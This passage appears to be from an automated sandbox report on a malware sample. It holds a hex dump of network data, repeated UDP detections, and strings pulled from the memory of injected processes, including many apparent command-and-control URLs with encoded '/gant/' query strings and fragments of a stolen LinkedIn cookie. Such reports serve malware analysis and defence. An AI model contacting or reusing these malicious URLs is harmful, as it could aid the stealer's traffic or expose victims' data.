60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00 Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<f
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: explorer.exe, 00000015.00000002.7501684681.0000000013EEC000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.0000000005D2C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
      Source: chkdsk.exe, 00000016.00000003.3597180024.0000000009B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: chkdsk.exe, 00000016.00000003.3597180024.0000000009B7F000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: powershell.exe, 00000003.00000002.2808103357.000001A4D5064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000003.00000002.2808103357.000001A4D4FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: explorer.exe, 00000015.00000002.7493355403.00000000105E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000105E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: explorer.exe, 00000015.00000002.7501684681.0000000015894000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.00000000076D4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZ
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/closed.png
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/style.css?v=3
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.cs
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.9
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/images/favicon.png
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lakeviewautomation.com/wp-login.php
      Source: explorer.exe, 00000015.00000000.3363239963.00000000106FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://mscrl.micro
      Source: explorer.exe, 00000015.00000003.4194013776.000000000D09C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D054000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4198007620.000000000D0A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
      Source: explorer.exe, 00000015.00000002.7493355403.00000000105E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000105E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: explorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
      Source: explorer.exe, 00000015.00000002.7493355403.00000000105E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4913724325.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000105E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217399131.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3363239963.00000000106FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: explorer.exe, 00000015.00000002.7469037835.00000000096C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3339772093.000000000A3E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3320672083.0000000002330000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: powershell.exe, 00000003.00000002.2607012213.000001A4BCB91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: explorer.exe, 00000015.00000002.7501684681.00000000145BC000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.00000000063FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://treebarktees.com/gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZ
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-yy.xyz
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-yy.xyz/gant/
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-yy.xyzReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brothersbears.com
      Source: chkdsk.exe, 00000016.00000002.7454580415.0000000006D68000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.brothersbears.com/?fp=B0INY8snl8mw%2BcAJH72nUzYVCaUxbDaGdZbUB3wx2UlG%2BELJV8E7p0rxWg6dgbH
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brothersbears.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brothersbears.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cc564966.com
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cc564966.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cc564966.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/gant/
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009C40000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/gant/?j-Jh9P=jm0Ymka9CPKmzcdBBLE6IhlOH61m8XD2x4zlXfOmsiB7fo0uyCG/WTQ0diDNuC9/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.netReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dachmotors.com
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dachmotors.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dachmotors.comReferer:
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flyshareinc.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flyshareinc.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flyshareinc.comReferer:
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gargaloid.ru
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gargaloid.ru/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gargaloid.ruReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grenoble-informatique.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grenoble-informatique.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grenoble-informatique.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.topReferer:
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/gant/
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyzReferer:
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.japurima.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.japurima.com/gant/
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.japurima.comReferer:
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com/gant/
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.comReferer:
      Source: explorer.exe, 00000015.00000002.7501684681.000000001524C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.000000000708C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.comReferer:
      Source: explorer.exe, 00000015.00000002.7487805404.000000000DE90000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.performingartshub.co.uk
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.performingartshub.co.uk/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.performingartshub.co.ukReferer:
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.redystedy.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.redystedy.com/gant/
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.redystedy.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sciencevale.xyz
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sciencevale.xyz/gant/
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sciencevale.xyzReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thejointcomission.org
      Source: explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thejointcomission.org/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thejointcomission.orgReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.touchdress.site
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.touchdress.site/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.touchdress.siteReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.comReferer:
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech
      Source: explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech/gant/
      Source: explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.techReferer:
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: explorer.exe, 00000015.00000002.7447578787.0000000002C10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppSEE
      Source: explorer.exe, 00000015.00000002.7463495574.00000000091B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3333082265.00000000091B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm:
      Source: powershell.exe, 00000003.00000002.2607012213.000001A4BCB91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSN
      Source: explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSder7
